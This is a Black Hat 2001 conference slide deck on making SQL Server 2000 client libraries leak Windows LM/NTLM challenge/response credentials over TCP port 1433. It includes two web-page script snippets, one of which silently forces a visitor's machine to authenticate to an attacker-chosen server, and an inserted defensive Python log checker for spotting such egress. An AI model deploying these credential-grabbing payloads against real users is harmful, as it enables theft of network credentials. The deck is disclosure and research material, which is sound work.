Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 1
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
Timothy M. Mullen, AnchorIS.Com, [email protected]
The Culprit: SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP Sockets, encryption, authentication, etc.
• Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)
Backgrounders…
• SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
• Integrated Authentication (NTLM Creds) needed Named Pipes
• Named Pipes required 139/445 open to authenticating system.
Backgrounders… cont.
• Integrated Authentication has _always_ been the recommended configuration.
• 139/445 has long been blocked at the router (if not, you are a yum-yum.)
• Many server-to-server apps authenticate over TCP 1433 because it is “safe”.
The Skinny
• DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports if changed).
The Problem
• Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
• Many have 1433 explicitly open for application support, server-to-server queries, etc.
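One defender-side check the slides imply but do not give, added here as an example that is not part of the original talk: flag accepted outbound TCP flows to the dbnetlib port (1433 by default) whose destination is not an allowlisted SQL server, since that is where a forced LM/NTLM exchange would go. The log format, the allowlist and the sample lines are constructed for this example.

```python
import ipaddress
from dataclasses import dataclass

SQL_PORTS = {1433}  # default dbnetlib TCP port; add the alternate port if it was changed
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
# Constructed allowlist: the server-to-server peers the 1433 hole exists for.
ALLOWED_SQL_SERVERS = {"10.0.5.20", "10.0.5.21"}

@dataclass
class Finding:
    src: str
    dst: str
    dport: int
    reason: str

def parse_line(line):
    # Constructed format: '<ts> <ACTION> src=<ip> dst=<ip> proto=<TCP|UDP> dport=<n>'
    parts = line.split()
    fields = dict(p.split("=", 1) for p in parts[2:] if "=" in p)
    return parts[1], fields["src"], fields["dst"], fields["proto"], int(fields["dport"])

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def find_suspect_sql_egress(lines):
    # Accepted TCP flows to a SQL port whose destination is not an allowlisted
    # server: that is where a forced LM/NTLM challenge/response would be sent.
    findings = []
    for line in lines:
        action, src, dst, proto, dport = parse_line(line)
        if action != "ACCEPT" or proto != "TCP" or dport not in SQL_PORTS:
            continue  # dropped, non-TCP or non-SQL traffic is out of scope here
        if not is_internal(dst):
            findings.append(Finding(src, dst, dport, "SQL port to external host"))
        elif dst not in ALLOWED_SQL_SERVERS:
            findings.append(Finding(src, dst, dport, "SQL port to non-allowlisted internal host"))
    return findings

# Constructed sample: workstation 10.0.9.14 doing normal work, then two
# connections that a page or mail message could force through dbnetlib.
SAMPLE_LOG = [
    "2001-07-11T10:00:01 ACCEPT src=10.0.9.14 dst=10.0.5.20 proto=TCP dport=1433",
    "2001-07-11T10:00:02 ACCEPT src=10.0.9.14 dst=10.0.5.20 proto=TCP dport=445",
    "2001-07-11T10:00:03 DROP src=10.0.9.14 dst=203.0.113.7 proto=TCP dport=445",
    "2001-07-11T10:00:04 ACCEPT src=10.0.9.14 dst=203.0.113.7 proto=TCP dport=1433",
    "2001-07-11T10:00:05 ACCEPT src=10.0.9.14 dst=10.1.1.1 proto=TCP dport=1433",
]
```

Running `find_suspect_sql_egress(SAMPLE_LOG)` flags the flow to 203.0.113.7 and the one to 10.1.1.1 and leaves the allowlisted server alone.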
The Sting
• Client side ODBC connections can specify the target server, authentication type, and the library to use.
• Web sites can request client to perform ADODB recordset requests, as well as other tasks.
• HTML email as well.
Somewhat Lame Example
• Web site with following tag:
    {
      conn = new ActiveXObject("ADODB.Connection");
      // Integrated Security=SSPI asks for the user's NTLM creds; Network Library=dbnetlib sends them over TCP 1433
      conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
      conn.Open();
    }
Example Cont…
• User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
• Easily engineered around…
Not So Lame Example
• Let’s try this one:
    {
      ns = new ActiveXObject("SQLNS.SQLNamespace");
      // Trusted_Connection=Yes requests integrated auth; Network Library=dbnetlib.dll carries it over TCP
      ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
    }
What’s the difference?
• SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !
• Silently grab the creds for fun and profit!
Live Demo
• Don’t try this at home! Professional driver on closed course.
Thanks! AnchorIS.Com www.anchoris.com HammerofGod www.hammerofgod.com
Timothy M. Mullen [email protected]@hammerofgod.com